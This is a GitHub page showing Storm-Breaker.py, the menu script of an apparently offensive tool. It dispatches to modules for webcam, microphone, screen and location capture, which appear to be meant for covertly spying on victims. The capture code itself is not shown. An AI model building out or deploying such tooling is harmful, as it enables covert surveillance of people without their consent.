forked from ultrasecurity/Storm-Breaker
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathStorm-Breaker.py
59 lines (38 loc) · 1.29 KB
/
Storm-Breaker.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
from colorama import Fore
import os
import sys
from modules import banner
import requests
from modules import localhost
import platform
sysname = platform.uname()[0]
while True:
banner.banner()
banner.infolist0()
try:
input1 = input(Fore.RED+" ┌─["+Fore.LIGHTGREEN_EX+"STORM-BREAKER"+Fore.BLUE+"~"+Fore.WHITE+"@HOME"+Fore.RED+"""]
└──╼ """+Fore.WHITE+"$ ")
if input1 == "1":
localhost.webcham()
elif input1 == "2":
if sysname == "Windows":
banner.banner()
print("\n This feature only works on Linux distributions\n".title())
input(Fore.RED+" [!]"+Fore.GREEN+" Back To Menu (Press Enter...) ")
else:
localhost.micro()
elif input1 == "3":
banner.banner()
localhost.screen()
elif input1 == "4":
banner.banner()
localhost.location()
elif input1 == "5":
banner.banner()
banner.infolist1()
elif input1 == "6":
print("\n God Lock :) ")
sys.exit()
except KeyboardInterrupt:
print("")
sys.exit()